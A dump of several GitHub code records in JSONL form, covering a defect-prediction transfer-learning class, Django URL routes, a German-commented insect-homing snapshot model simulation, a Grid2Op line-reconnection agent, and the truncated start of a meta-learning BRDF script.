plt.savefig('plt_diag_ts_map_{}-{}.{ext}'.format(ext=extn, *in_names))\n\n\nif __name__ == '__main__':\n main(extn='pdf')\n","repo_name":"mkstratos/stj_pv","sub_path":"STJ_PV/compare_runs_map.py","file_name":"compare_runs_map.py","file_ext":"py","file_size_in_byte":9700,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"14220513029","text":"from Utils.classlib import *\nimport numpy as np\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.model_selection import train_test_split\nfrom imblearn.over_sampling import SMOTE\nfrom Algorithms.Classifier import *\nfrom sklearn.ensemble import AdaBoostClassifier\n\nfrom sklearn.metrics import roc_auc_score, accuracy_score\n\n\nclass DTB(object):\n def __init__(self, Xs, Ys, Xt, Yt, n_neighbors=10, iter=20, clf='RF',\n n_estimators=10, criterion='gini', max_features='auto', RFmin_samples_split=2, # RF\n Boostnestimator=50, BoostLearnrate=1, # Boost\n CARTsplitter='best', # CART\n Ridgealpha=1, Ridgenormalize=False, # Ridge\n NBtype='gaussian',\n SVCkernel='poly', C=1, degree=3, coef0=0.0, SVCgamma=1\n ):\n self.Xsource = np.asarray(Xs)\n self.Ysource = np.asarray(Ys)\n self.Xtarget = np.asarray(Xt)\n self.Ytarget = np.asarray(Yt)\n self.n_neighbors = int(n_neighbors)\n self.iter = iter\n self.clfType = clf\n\n self.n_estimators = n_estimators\n self.criterion = criterion\n self.max_features = max_features\n self.RFmin_samples = RFmin_samples_split\n self.Boostne = Boostnestimator\n self.BoostLearnrate = BoostLearnrate\n self.NBType = NBtype\n self.CARTsplitter = CARTsplitter\n self.Ridgealpha = Ridgealpha\n self.Ridgenormalize = Ridgenormalize\n self.SVCkernel = SVCkernel\n self.coef0 = coef0\n self.gamma = SVCgamma\n self.degree = degree\n self.C = C\n\n\n\n def _NNfilter(self):\n knn = NearestNeighbors()\n knn.fit(self.Xsource)\n data = []\n ysel = []\n\n for item in self.Xtarget:\n tmp = knn.kneighbors(item.reshape(1, -1), self.n_neighbors, return_distance=False)\n tmp = tmp[0]\n for i in tmp:\n if list(self.Xsource[i]) not in data:\n data.append(list(self.Xsource[i]))\n ysel.append(self.Ysource[i])\n self.Xsource = np.asanyarray(data)\n self.Ysource = np.asanyarray(ysel)\n\n # oversample for minor part\n def _SMOTE(self):\n smote = SMOTE()\n self.Xsource, self.Ysource = smote.fit_resample(self.Xsource, self.Ysource)\n\n def _max_min(self, x):\n shape = np.asarray(x).shape\n Max = np.zeros(shape[1])\n Min = np.zeros(shape[1])\n for i in range(0, shape[1]):\n a = x[:, i]\n Max[i] = np.max(a)\n Min[i] = np.min(a)\n\n return Max, Min\n\n def _weight(self):\n max, min = self._max_min(self.Xtarget)\n shape = self.Xsource.shape\n s = np.zeros(shape[0])\n w = np.zeros(shape[0])\n for i in range(0,shape[0]):\n tmp = 0\n for j in range(0, shape[1]):\n if self.Xsource[i][j] <= max[j] and self.Xsource[i][j] >= min[j]:\n tmp = tmp + 1\n s[i] = tmp\n w[i] = s[i] / (1.0 * np.power(shape[1] - s[i] + 1, 2))\n\n return w\n\n def fit(self):\n self._NNfilter()\n self._SMOTE()\n weight = self._weight()\n\n trainX, self.testX, trainY, self.testY = train_test_split(self.Xtarget, self.Ytarget, test_size=0.3)\n while len(np.unique(self.testY)) <= 1:\n trainX, testX, trainY, self.testY = train_test_split(self.Xtarget, self.Ytarget, test_size=0.3)\n if self.clfType == 'RF':\n m = RandomForestClassifier(n_estimators=self.n_estimators, criterion=self.criterion,\n max_features=self.max_features, min_samples_split=self.RFmin_samples)\n if self.clfType == 'SVM':\n m = SVC(kernel=self.SVCkernel, C=self.C, degree=self.degree, coef0=self.coef0, gamma=self.gamma)\n if self.clfType == 'Boost':\n m = AdaBoostClassifier(n_estimators=self.Boostne, learning_rate=self.BoostLearnrate)\n if self.clfType == 'NB':\n if self.NBType == 'gaussian':\n m = GaussianNB()\n elif self.NBType == 'multinomial':\n m = MultinomialNB()\n elif self.NBType == 'bernoulli':\n m = BernoulliNB()\n if self.clfType == 'CART':\n m = DecisionTreeClassifier(criterion=self.criterion, splitter=self.CARTsplitter, max_features=self.max_features, min_samples_split=self.RFmin_samples)\n if self.clfType == 'Ridge':\n m = RidgeClassifier(alpha=self.Ridgealpha, normalize=self.Ridgenormalize)\n\n # self.model = trAdaBoost(self.Xsource, trainX, self.Ysource, trainY, testX, self.iter, initWeight=weight, clf=m)\n self.model = AdaBoostClassifier(base_estimator=m, n_estimators=self.iter, algorithm='SAMME')\n self.model.fit(self.Xsource, self.Ysource, sample_weight=weight)\n\n\n def predict(self):\n # if self.model.error == 1 or len(np.unique(self.testY)) <= 1:\n # self.AUC = 0\n # return\n Ypredict = self.model.predict(self.testX)\n\n self.AUC = roc_auc_score(self.testY, Ypredict)\n self.acc = accuracy_score(self.testY, Ypredict)\n","repo_name":"COLA-Laboratory/icse2020","sub_path":"code/Algorithms/DTB.py","file_name":"DTB.py","file_ext":"py","file_size_in_byte":5333,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"5749743379","text":"\"\"\"\npath('qcontrols/create', qcontrol.CreateQcontrol.as_view() ,name='create_qcontrol'),\n\"\"\"\n\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.views.generic.detail import DetailView\n\nfrom prod.models.preprod import Preprod\nfrom prod.models.qcontrol import Qcontrol\nfrom prod.models.rejprod import Rejprod\nfrom .views import home,preprod,qcontrol,rejprod\n\nurlpatterns = [\n path('', home.index,name='hello'),\n path('preprods', preprod.preprod_liste ,name='preprods'),\n path('preprods/create', preprod.CreatePreprod.as_view() ,name='create_preprod'),\n path('preprods/update/<int:pk>', preprod.UpdatePreprod.as_view() ,name='update_preprod'),\n path('preprods/<int:pk>',\n DetailView.as_view(model=Preprod, template_name=\"prod/preprod/preprod_detail.html\"),\n name='detail_preprod'),\n path('qcontrols', qcontrol.qcontrol_liste ,name='qcontrols'),\n path('qcontrols/update/<int:pk>', qcontrol.UpdateQcontrol.as_view() ,name='update_qcontrol'),\n path('qcontrols/<int:pk>',\n DetailView.as_view(model=Qcontrol, template_name=\"prod/qcontrol/qcontrol_detail.html\"),\n name='detail_qcontrol'),\n path('rejprods', rejprod.rejprod_liste ,name='rejprods'),\n path('rejprods/create', rejprod.CreateRejprod.as_view() ,name='create_rejprod'),\n path('rejprods/update/<int:pk>', rejprod.UpdateRejprod.as_view() ,name='update_rejprod'),\n path('rejprods/<int:pk>',\n DetailView.as_view(model=Rejprod, template_name=\"prod/rejprod/rejprod_detail.html\"),\n name='detail_rejprod'),\n]","repo_name":"faical2020/faical2020","sub_path":"rejet/prod/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10663541983","text":"import numpy as np\nimport math\nimport matplotlib.pyplot as plt\nfrom numpy.core.shape_base import vstack\nfrom sys import exit\n\n#Initialisieren der Landmarks\nLM1 = [3.5, 2]\nLM2 = [3.5, -2]\nLM3 = [ 0, -4]\nLMR = 0.5 #Radius der Landmarks\n\n'''\n Definiert die Flächen eine Snapshot/ einer Retina-Abbildung (Circle) als 2 Punkte \n und die Rotationswinkel im Bogenmaß zur Mitte beider Punkte.\n Der Mittelpunkt des Kreises wird bei der Berechnung des \n Mittelpunktes der Fläche verwendet.\n'''\nclass Area(object):\n def __init__(self, p1, p2, circlecenter):\n self.p1 = p1\n self.p2 = p2\n\n theta = polarConverter2(p1, p2, circlecenter)\n self.center = (theta[0] + ((theta[1]-theta[0])/2)) % (2*math.pi)\n def __repr__(self) -> str:\n return str(self.p1) + \" | \" + str(self.p2) + \" | \" + str(self.center)\n def __eq__(self, o: object) -> bool:\n return self.p1 == object.p1 and self.p2 == object.p2 and self.center == object.center\n\n\n'''\n Definiert den Kreis eines Snapshots/einer Retina-Abbildung\n als eine Liste von Flächen, gegenübergesetzten Flächen und\n der Mittepunkt des Kreises \n'''\nclass Circle(object):\n def __init__(self, areas, center):\n self.center = center\n self.areas = []\n self.op_areas = []\n # Sort Areas\n theta = []\n order = list(range(len(areas)))\n for a in areas:\n theta.append( polarConverter(a, center)[0])\n for t in theta:\n for i in theta:\n if t > i:\n temp = t\n t = i\n i = temp\n for o in order:\n self.areas.append(areas[o])\n # Calculate oposite areas\n if len(self.areas) == 3:\n self.op_areas.append(Area(self.areas[0].p2, self.areas[2].p1, center))\n self.op_areas.append(Area(self.areas[2].p2, self.areas[1].p1, center))\n self.op_areas.append(Area(self.areas[1].p2, self.areas[0].p1, center))\n if len(self.areas) == 2:\n self.op_areas.append(Area(self.areas[0].p1, self.areas[1].p2, center))\n self.op_areas.append(Area(self.areas[1].p1, self.areas[0].p2, center))\n if len(self.areas) == 1:\n self.op_areas.append(Area(self.areas[0].p2, self.areas[0].p1, center))\n\n'''\n Mathematische Funktionen zur Bearbeitung von Vektoren (hier: orthogonale Rotation und Längenberechnung)\n'''\n# Vector Rotation\ndef rotateVector2DClockwise(vector):\n return np.array([vector[1], -vector[0]])\ndef rotateVector2DCounterClockwise(vector):\n return np.array([-vector[1], vector[0]])\ndef vector2DLenght(vector):\n return math.sqrt(vector[0]**2 + vector[1]**2)\n\n#Skalarprodukt\ndef skalar(u, v):\n return u[0]*v[0]+u[1]*v[1]\n\n'''\n Gibt die Fläche zurück, die durch ein Landmark auf einen Kreis mit gegebenem Radius \n projiziert wird. Dessen Mittelpunkt liegt auf middle.\n'''\ndef calculateArea(lm, middle, radius):\n #Convert to numpy Arrays (Vectors)\n lm = np.array(lm)\n middle = np.array(middle)\n M_LM = lm - middle # vector mitte zu LM\n M_LMR = rotateVector2DClockwise(M_LM) #vector mitte zu LM rotiert\n M_LMR_05 = M_LMR / (2 * vector2DLenght(M_LMR)) # Vektor durch Länge teilen, dann anpassen (mit *2) wegen r=0.5 von LM\n M_LM_EDGE0 = M_LM + M_LMR_05 # raender von LM1 \n M_LM_EDGE1 = M_LM - M_LMR_05 # andere ^\n M_LM_EDGE0_P1 = (M_LM_EDGE0 / vector2DLenght(M_LM_EDGE0)) * radius #center zu schnittpunkt Kreis Rand1\n M_LM_EDGE1_P2 = (M_LM_EDGE1 / vector2DLenght(M_LM_EDGE1)) * radius # ^ andere\n return Area(middle + M_LM_EDGE0_P1, middle +M_LM_EDGE1_P2, middle)\n\n'''\n Beide Funktionen geben die Rotation im Bogenmass ’Theta' der beiden Punkte\n die einen Fläche bilden zurück. Verwendet wird der Mittelpunkt des Kreises middle für die Berechnung.\n'''\ndef polarConverter(area, middle):\n theta = [0,0]\n theta[0] = math.atan2(area.p1[1] - middle[1], area.p1[0] - middle[0])\n theta[1] = math.atan2(area.p2[1] - middle[1], area.p2[0] - middle[0]) \n\n if theta[0] < 0:\n theta[0] += 2*(math.pi)\n if theta[1] < 0:\n theta[1] += 2*(math.pi) \n if theta[0] > theta[1]:\n theta[1] += 2*(math.pi)\n\n return theta\ndef polarConverter2(p1, p2, middle):\n theta = [0,0]\n theta[0] = math.atan2(p1[1] - middle[1], p1[0] - middle[0])\n theta[1] = math.atan2(p2[1] - middle[1], p2[0] - middle[0]) \n\n if theta[0] < 0:\n theta[0] += 2*(math.pi) \n if theta[1] < 0:\n theta[1] += 2*(math.pi) \n if theta[0] > theta[1]:\n theta[1] += 2*(math.pi)\n\n return theta\ndef polarConverter3(punkt, middle):\n return math.atan2(punkt[1]-middle[1], punkt[0]-middle[0])\n'''\n Funktion zur Bestimmung, ob sich zwei gegebene Flächen überlappen.\n middle ist der Mittelpunkt des Kreises, zu dem die Flächen gehören.\n'''\ndef areaOverlap(area1, area2, middle):\n # Polar Coordinates\n angles = [[0,0],[0,0]]\n angles[0] = polarConverter(area1, middle)\n angles[1] = polarConverter(area2, middle)\n\n # a1.p1 in a2\n a = (angles[0][0] >= angles[1][0] and angles[0][0] <= angles[1][1]) \n # a1.p2 in a2\n b = (angles[0][1] >= angles[1][0] and angles[0][1] <= angles[1][1]) \n # a2.p1 in a1\n c = (angles[1][0] >= angles[0][0] and angles[1][0] <= angles[0][1])\n # a2.p2 in a1\n d = (angles[1][1] >= angles[0][0] and angles[1][1] <= angles[0][1])\n \n return a or b or c or d\n\n'''\n Gibt einen Circle zurück, der eine Retina-Abbildung oder einen Snapshot repräsentiert, mit einem Mittelpunkt middle und einem gegebenen Radius radius.\n Bei der Berechnung der entsprechenden Flächen wird geprüft, ob sich Flächen überlappen und verbindet sie automatisch, wenn dies der Fall ist. \n'''\ndef takeSnapshot(middle, radius):\n areas = [] # Real Projected areas\n valid_areas = [] # Joined reduced areas\n \n #Calculate Areas\n areas.append(calculateArea(LM1, middle, radius))\n areas.append(calculateArea(LM2, middle, radius))\n areas.append(calculateArea(LM3, middle, radius))\n \n # Calculate the rotation degrees in radians of the points of all the areas projected by the landmarks\n theta = [0 for x in range(6)] \n for i in range(0, 3):\n theta[i*2] = math.atan2(areas[i].p1[1]- middle[1], areas[i].p1[0]- middle[0])\n theta[i*2 + 1] = math.atan2(areas[i].p2[1]- middle[1], areas[i].p2[0]- middle[0])\n \n if theta[i*2] < 0:\n theta[i*2] += 2*(math.pi)\n \n if theta[i*2 + 1] < 0:\n theta[i*2 + 1] += 2*(math.pi)\n \n if theta[i*2] > theta[i*2 + 1]:\n theta[i*2 + 1] += 2*(math.pi)\n\n area1 = True\n area2 = True\n area3 = True\n # Überprüfen mit areaOverlap ob es Überlappungen gibt und verwenden von theta, um zu bestimmen, wie die verbunden werden sollen.\n if (areaOverlap(areas[0], areas[1], middle) and areaOverlap(areas[1], areas[2], middle)) or (areaOverlap(areas[0], areas[2], middle) and areaOverlap(areas[2], areas[1], middle)):\n area1 = False\n area2 = False\n area3 = False\n index_min = 0\n index_max = 0\n for x in theta:\n if x == min(theta):\n break\n index_min += 1\n for x in theta:\n if x == max(theta):\n break\n index_max += 1\n valid_areas.append(Area(areas[int(index_min/2)].p1, areas[int(index_max/2)].p2, middle))\n else:\n if areaOverlap(areas[0], areas[1], middle):\n area1 = False\n area2 = False\n # A1 innerhalb von a A2\n if (theta[0] >= theta[2] and theta[0] <= theta[3]) and (theta[1] >= theta[2] and theta[1] <= theta[3]):\n valid_areas.append(areas[1])\n # A2 innerhalb von a A1\n elif (theta[2] >= theta[0] and theta[2] <= theta[1]) and (theta[3] >= theta[0] and theta[3] <= theta[1]):\n valid_areas.append(areas[0])\n # A1 rechts von A2 a1.p1 zb. a2 | a2.p1 -> a1.p2\n elif theta[0] >= theta[2] and theta[0] <= theta[3]:\n valid_areas.append(Area(areas[1].p1, areas[0].p2, middle))\n # A1 links von A2 a1.p2 zb. a2\n elif theta[1] >= theta[2] and theta[1] <= theta[3]:\n valid_areas.append(Area(areas[0].p1, areas[1].p2, middle))\n #print(\"Overlap A1-A2\")\n if areaOverlap(areas[0], areas[2], middle):\n area1 = False\n area3 = False\n # A1 innerhalb von a A3\n if (theta[0] >= theta[4] and theta[0] <= theta[5]) and (theta[1] >= theta[4] and theta[1] <= theta[5]):\n valid_areas.append(areas[2])\n # A3 innerhalb von a A1\n elif (theta[4] >= theta[0] and theta[4] <= theta[1]) and (theta[5] >= theta[0] and theta[5] <= theta[1]):\n valid_areas.append(areas[0])\n # A1 rechts von A3 a1.p1 zb. a3 | a2.p1 -> a1.p2\n elif theta[0] >= theta[4] and theta[0] <= theta[5]:\n valid_areas.append(Area(areas[2].p1, areas[0].p2, middle))\n # A1 links von A3 a1.p2 zb. a3\n elif theta[1] >= theta[4] and theta[1] <= theta[5]:\n valid_areas.append(Area(areas[0].p1, areas[2].p2, middle))\n #print(\"Overlap A1-A3\")\n if areaOverlap(areas[1], areas[2], middle):\n area2 = False\n area3 = False\n # A3 innerhalb von a A2\n if (theta[4] >= theta[2] and theta[4] <= theta[3]) and (theta[5] >= theta[2] and theta[5] <= theta[3]):\n valid_areas.append(areas[1])\n # A2 innerhalb von a A3\n elif (theta[2] >= theta[4] and theta[2] <= theta[5]) and (theta[3] >= theta[4] and theta[3] <= theta[5]):\n valid_areas.append(areas[2])\n # A3 rechts von A2 a1.p1 zb. a2 | a2.p1 -> a1.p2\n elif theta[4] >= theta[2] and theta[4] <= theta[3]:\n valid_areas.append(Area(areas[1].p1, areas[2].p2, middle))\n # A3 links von A2 a1.p2 zb. a2\n elif theta[5] >= theta[2] and theta[5] <= theta[3]:\n valid_areas.append(Area(areas[2].p1, areas[1].p2, middle))\n #print(\"Overlap A2-A3\")\n if area1:\n valid_areas.append(areas[0])\n if area2:\n valid_areas.append(areas[1])\n if area3:\n valid_areas.append(areas[2])\n \n return Circle(valid_areas, middle) \n\n# Main\n'''\nSnapshot wird bei Startpunkt [0, 0] initialisiert\n'''\nsnapshot = takeSnapshot(np.array([0,0]), 1)\n\n'''\nMenü mit drei Auswahlmöglichkeiten öffnet sich für den Benutzer.\n'''\nwhile True: \n #Plot wird eine Größe zugeordnet\n fig, ax = plt.subplots(figsize = (7,7))\n \n print(\"\\nBitte wählen Sie einen Option: \\n(Erwartete eingaben: '1' '2' '0')\")\n print(\"1. Einen Homing-Vektor ausgeben\")\n print(\"2. Alle Homing-Vektoren ausgeben\")\n print(\"0. Programm beenden\\n\")\n while True:\n try:\n eingabe = int(input())\n except:\n eingabe = 3\n if eingabe != 1 or eingabe != 2 or eingabe != 0:\n break\n else:\n print(\"Falsches Eingabe! Bitte versuchen Sie es erneut.\")\n if eingabe == 0:\n exit()\n elif eingabe == 1:\n while True:\n print(\"Nur Koordinaten im bereich [-7;7] sind erlaubt\")\n print(\"Bitte geben Sie Ihre x-Koordinate ein:\")\n try: \n x_coord = int(input())\n print(\"Bitte geben Sie Ihre y-Koordinate ein:\")\n y_coord = int(input())\n except :\n continue\n\n if ((x_coord >= -7 and x_coord <= 7) and (y_coord >= -7 and y_coord <= 7)) or\\\n ((x_coord != 0 and y_coord != 0) or (x_coord != LM1[0] and y_coord != LM1[1]) or\\\n (x_coord != LM2[0] and y_coord != LM2[1]) or (x_coord != LM3[0] and y_coord != LM3[1])):\n break\n else:\n print(\"Falsche Eingabe! Bitte versuchen Sie es erneut.\")\n #print('X: ' + str(j-7) + \" | Y: \" + str(l-7))\n \n '''\n Retina-Abbildung wird bei den gegebenen Koordinaten erstellt.\n '''\n retina = takeSnapshot(np.array([x_coord, y_coord]), 2)\n \n '''\n Rotations- und Translations-Vektoren werden durch Zuordnung und Vergleich der Flächen bestimmt.\n '''\n rotation_vectors = []\n translation_vectors = []\n # Berechnen des Rotations- und Translationsvektor jedes Snapshot-Fläche und seiner gepaarten Retina-Fläche \n for s_area in snapshot.areas:\n abstand = []\n pair = 0\n #Retina-Abbildungsflächen werden den passenden Snapshot-Flächen zugeordnet\n for r_area in retina.areas:\n berechnung = abs(s_area.center - r_area.center)\n \n if (berechnung > (math.pi)):\n berechnung = (2*math.pi - berechnung)\n abstand.append(abs(berechnung))\n \n if (abs(berechnung)) == min(abstand):\n pair = r_area\n \n # Rotationsvektoren werden erstellt\n if s_area.center < pair.center:\n #print(r_area.center)\n rotation_vectors.append(rotateVector2DClockwise([math.cos(pair.center), math.sin(pair.center)]))\n elif s_area.center > pair.center:\n rotation_vectors.append(rotateVector2DCounterClockwise([math.cos(pair.center), math.sin(pair.center)]))\n else:\n rotation_vectors.append(np.array([0,0]))\n \n # Translationsvektoren werden erstellt\n # Breite der Areas berechnen\n # Breiten vergleichen\n # if b_s < b_r : nach innen\n # if b_s > b_r : nach außen\n # else [0,0]\n polar_s = polarConverter2( s_area.p1, s_area.p2, snapshot.center)\n polar_r = polarConverter2( pair.p1, pair.p2, retina.center)\n breite_s = polar_s[1] - polar_s[0] \n breite_r = polar_r[1] - polar_r[0]\n if breite_s < breite_r:\n translation_vectors.append(np.array([math.cos(pair.center), math.sin(pair.center)])*-1 )\n elif breite_s > breite_r:\n translation_vectors.append(np.array([math.cos(pair.center), math.sin(pair.center)]))\n else:\n translation_vectors.append(np.array([0,0]))\n\n # Berechnen der \"opposite\"-Vektoren mit denselben Methoden\n for s_area in snapshot.op_areas:\n abstand = []\n pair = 0\n #\"Opposite\"-Flächen des Snapshots werden nun mit den entsprechenden Retina-\"Opposite\"-Flächen zusammengepaart.\n for r_area in retina.op_areas:\n berechnung = abs(s_area.center - r_area.center)\n \n if (berechnung > (math.pi)):\n berechnung = (2*math.pi - berechnung)\n abstand.append(abs(berechnung))\n \n if (abs(berechnung)) == min(abstand):\n pair = r_area \n # Rotation Vektoren \n if s_area.center < pair.center:\n rotation_vectors.append(rotateVector2DClockwise([math.cos(pair.center), math.sin(pair.center)]))\n elif s_area.center > pair.center:\n rotation_vectors.append(rotateVector2DCounterClockwise([math.cos(pair.center), math.sin(pair.center)]))\n else:\n rotation_vectors.append(np.array([0,0]))\n # Translation Vektoren\n # Breite der Areas berechnen\n # Breiten vergleichen\n # if b_s < b_r : nach innen\n # if b_s > b_r : nach außen\n # else [0,0]\n polar_s = polarConverter2( s_area.p1, s_area.p2, snapshot.center)\n polar_r = polarConverter2( pair.p1, pair.p2, retina.center)\n breite_s = polar_s[1] - polar_s[0] \n breite_r = polar_r[1] - polar_r[0]\n if breite_s < breite_r:\n translation_vectors.append(np.array([math.cos(pair.center), math.sin(pair.center)])*-1 )\n elif breite_s > breite_r:\n translation_vectors.append(np.array([math.cos(pair.center), math.sin(pair.center)]))\n else:\n translation_vectors.append(np.array([0,0]))\n\n # Alle Rotations- und Translationsvektoren werden zusammengefügt.\n vt = np.array([0,0])\n vp = np.array([0,0])\n for x in rotation_vectors:\n vt = vt + x\n for x in translation_vectors:\n vp = vp + x\n\n '''\n Homing-Vektor ergibt sich aus vt + vp*3\n '''\n v = vt + (3 * vp) \n \n nullpunkt_v = -(retina.center)\n thetaDiff = abs(polarConverter3(v, retina.center) - polarConverter3(nullpunkt_v, retina.center))\n avg_diff = np.rad2deg(thetaDiff)\n if (avg_diff > 180):\n avg_diff = 360 - avg_diff\n \n print(\"Abweichung in Grad: \" + str(avg_diff))\n print(\"V = \" + str(v)) #Ausgabe des Homing-Vektors\n \n '''\n Quiver-Plot wird erstellt\n '''\n ax.quiver(retina.center[0], retina.center[1], v[0], v[1])\n ax.set_title('ATS - Snapshotmodel')\n plt.show()\n\n elif eingabe == 2:\n #Für jede Koordinate von [-7;-7] bis [7;7] wird ein Homing-Vektor erstellt\n avg_diff_arr = [] # zur Bestimmung der Durchschnittsabweichung der Homing-Vektoren in Grad\n \n for j in range(15):\n for l in range(15):\n # Homing-Vektoren werden NICHT bei der Snapshot-Koordinate [0;0] oder bei den Landmarks erstellt.\n if ((j-7) == 0 and (l-7) == 0) or ((j-7) == LM1[0] and (l-7) == LM1[1]) or ((j-7) == LM2[0] and (l-7) == LM2[1]) or ((j-7) == LM3[0] and (l-7) == LM3[1]): \n continue\n \n '''Retina-Abbildung wird mit den entsprechenden Koordinaten erstellt.'''\n retina = takeSnapshot(np.array([j-7, l-7]), 2)\n \n '''\n Rotations- und Translations-Vektoren werden durch Zuordnung und Vergleich der Flächen bestimmt.\n '''\n rotation_vectors = []\n translation_vectors = []\n \n for s_area in snapshot.areas:\n abstand = []\n pair = 0\n #Retina-Abbildungsflächen werden den passenden Snapshot-Flächen zugeordnet\n for r_area in retina.areas:\n berechnung = abs(s_area.center - r_area.center)\n \n if (berechnung > (math.pi)):\n berechnung = (2*math.pi - berechnung)\n abstand.append(abs(berechnung))\n \n if (abs(berechnung)) == min(abstand):\n pair = r_area\n \n # Bestimmung der Rotationsvektoren\n if s_area.center < pair.center:\n #print(r_area.center)\n rotation_vectors.append(rotateVector2DClockwise([math.cos(pair.center), math.sin(pair.center)]))\n elif s_area.center > pair.center:\n rotation_vectors.append(rotateVector2DCounterClockwise([math.cos(pair.center), math.sin(pair.center)]))\n else:\n rotation_vectors.append(np.array([0,0]))\n # Determine Translation Vector\n # Breite der Areas berechnen\n # Breiten vergleichen\n # if b_s < b_r : nach innen\n # if b_s > b_r : nach außen\n # else [0,0]\n polar_s = polarConverter2( s_area.p1, s_area.p2, snapshot.center)\n polar_r = polarConverter2( pair.p1, pair.p2, retina.center)\n breite_s = polar_s[1] - polar_s[0] \n breite_r = polar_r[1] - polar_r[0]\n if breite_s < breite_r:\n translation_vectors.append(np.array([math.cos(pair.center), math.sin(pair.center)])*-1 )\n elif breite_s > breite_r:\n translation_vectors.append(np.array([math.cos(pair.center), math.sin(pair.center)]))\n else:\n translation_vectors.append(np.array([0,0]))\n\n # \"Opposite\"-Flächen des Snapshots werden nun mit den entsprechenden Retina-\"Opposite\"-Flächen zusammengepaart.\n for s_area in snapshot.op_areas:\n abstand = []\n pair = 0\n # Find pair\n for r_area in retina.op_areas:\n berechnung = abs(s_area.center - r_area.center)\n \n if (berechnung > (math.pi)):\n berechnung = (2*math.pi - berechnung)\n abstand.append(abs(berechnung))\n \n if (abs(berechnung)) == min(abstand):\n pair = r_area \n \n # Bestimmung der Rotationsvektoren\n if s_area.center < pair.center:\n rotation_vectors.append(rotateVector2DClockwise([math.cos(pair.center), math.sin(pair.center)]))\n elif s_area.center > pair.center:\n rotation_vectors.append(rotateVector2DCounterClockwise([math.cos(pair.center), math.sin(pair.center)]))\n else:\n rotation_vectors.append(np.array([0,0]))\n \n # Bestimmung der Translationsvektoren\n polar_s = polarConverter2( s_area.p1, s_area.p2, snapshot.center)\n polar_r = polarConverter2( pair.p1, pair.p2, retina.center)\n breite_s = polar_s[1] - polar_s[0] \n breite_r = polar_r[1] - polar_r[0]\n if breite_s < breite_r:\n translation_vectors.append(np.array([math.cos(pair.center), math.sin(pair.center)])*-1 )\n elif breite_s > breite_r:\n translation_vectors.append(np.array([math.cos(pair.center), math.sin(pair.center)]))\n else:\n translation_vectors.append(np.array([0,0]))\n\n # Alle Rotations- und Translationsvektoren werden zusammengefügt.\n vt = np.array([0,0])\n vp = np.array([0,0])\n for x in rotation_vectors:\n vt = vt + x\n for x in translation_vectors:\n vp = vp + x\n\n '''\n Homing-Vektor ergibt sich aus vt + vp*3\n '''\n v = vt + (3 * vp)\n \n nullpunkt_v = -(retina.center)\n thetaDiff = abs(polarConverter3(v, retina.center) - polarConverter3(nullpunkt_v, retina.center))\n \n avg_diff = np.rad2deg(thetaDiff)\n if (avg_diff > 180):\n avg_diff = 360 - avg_diff\n \n avg_diff_arr.append(avg_diff)\n \n #print(str(avg_diff) + \" | Koordinaten (\" + str(retina.center) + \")\")\n \n '''\n Quiver-Plot wird erstellt\n '''\n ax.quiver(retina.center[0], retina.center[1], v[0], v[1])\n #Displaying the plot\n \n print(str(np.average(avg_diff_arr)) + \" => Durchschnittliche Abweichung in Grad\")\n ax.set_title('ATS - Snapshotmodel')\n plt.show()","repo_name":"1x5x7/THK-ATS-HomingVectors","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":23871,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32436692598","text":"import numpy as np\nfrom grid2op.Agent import BaseAgent\nfrom grid2op.Observation import BaseObservation\nfrom grid2op.Action import ActionSpace\nfrom grid2op.Exceptions import AgentError\n\n\nclass RecoPowerlinePerArea(BaseAgent):\n \"\"\"This class acts like the :class:`RecoPowerlineAgent` but it is able\n to reconnect multiple lines at the same steps (one line per area).\n \n The \"areas\" are defined by a list of list of substation id provided as input.\n\n Of course the area you provide to the agent should be the same as the areas\n used in the rules of the game. Otherwise, the agent might try to reconnect\n two powerline \"in the same area for the environment\" which of course will\n lead to an illegal action.\n\n You can use it like:\n \n .. code-block:: python\n \n import grid2op\n from grid2op.Agent import RecoPowerlinePerArea\n\n env_name = \"l2rpn_idf_2023\" # (or any other env name supporting the feature)\n env = grid2op.make(env_name)\n agent = RecoPowerlinePerArea(env.action_space, env._game_rules.legal_action.substations_id_by_area)\n \n\n \"\"\"\n def __init__(self, action_space: ActionSpace, areas_by_sub_id: dict):\n super().__init__(action_space)\n self.lines_to_area_id = np.zeros(type(action_space).n_line, dtype=int) - 1\n for aread_id, (area_nm, sub_this_area) in enumerate(areas_by_sub_id.items()):\n for line_id, subor_id in enumerate(type(action_space).line_or_to_subid):\n if subor_id in sub_this_area:\n self.lines_to_area_id[line_id] = aread_id\n if (self.lines_to_area_id == -1).any():\n raise AgentError(\"some powerline have no area id\")\n self.nb_area = len(areas_by_sub_id)\n \n def act(self, observation: BaseObservation, reward: float, done : bool=False):\n line_stat_s = observation.line_status\n cooldown = observation.time_before_cooldown_line\n can_be_reco = ~line_stat_s & (cooldown == 0)\n if not can_be_reco.any():\n # no line to reconnect\n return self.action_space()\n area_used = np.full(self.nb_area, fill_value=False, dtype=bool)\n reco_ids = []\n for l_id in np.where(can_be_reco)[0]:\n if not area_used[self.lines_to_area_id[l_id]]:\n reco_ids.append(l_id)\n area_used[self.lines_to_area_id[l_id]] = True\n res = self.action_space({\"set_line_status\": [(l_id, +1) for l_id in reco_ids]})\n return res\n","repo_name":"rte-france/Grid2Op","sub_path":"grid2op/Agent/recoPowerLinePerArea.py","file_name":"recoPowerLinePerArea.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":240,"dataset":"github-code","pt":"16"} +{"seq_id":"28883837435","text":"from datetime import datetime\nimport os\nimport copy\n\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\nimport torch\nfrom torch import optim\nfrom torch.utils.data import DataLoader\nimport learn2learn as l2l\nfrom ruamel.yaml import YAML\n\nimport datasets, sampler, nbrdf, utils\nfrom utils import freeze, unfreeze, split_merl\n\nimport argparse\n\n\ndef fast_adapt(learner, task, splr, shots, k, loss_fn):\n task_train, task_test = task\n\n invalid_samples = list()\n\n for step in range(k):\n rangles_adapt, mlp_input_adapt, 